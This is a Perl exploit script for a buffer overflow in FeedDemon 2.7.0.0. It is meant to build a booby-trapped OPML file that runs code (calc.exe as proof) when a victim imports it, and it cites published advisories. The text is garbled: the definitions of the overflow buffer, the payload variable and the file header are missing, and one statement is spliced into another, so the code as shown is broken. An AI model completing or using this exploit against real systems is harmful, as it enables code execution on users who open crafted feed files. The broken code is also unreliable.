#!/usr/local/bin/perl #----------------------------------------------------------------------------- # FeedDemon version 2.7.0.0 Buffer overFlow # Reference: # http://security.bkis.vn/?p=329 # http://www.securityfocus.com/bid/33630/info # http://secunia.com/advisories/33718/ # Tested in Windows XP Sp2 (English) # Created by cenjan (xcenjanx@yahoo.com) # Description: + This code generates a opml file (feeddemonexploit.opml) # + Import that file by the Import Feed function of Feed Demon # + The calc.exe will execute #----------------------------------------------------------------------------- my $head='feeddemonexploit.opml'); print f "\xff\xfe"; close(f); open (f,'>>:encoding(ucs-2le)','feeddemonexploit.opml'); print f $head; close(f); open (f,'>>feeddemonexploit.opml'); print f $overflow; print f $devil; close(f); open (f,'>>:encoding(ucs-2le)','feeddemonexploit.opml'); print f $tail; close (f); print "Create exploit file successfully!";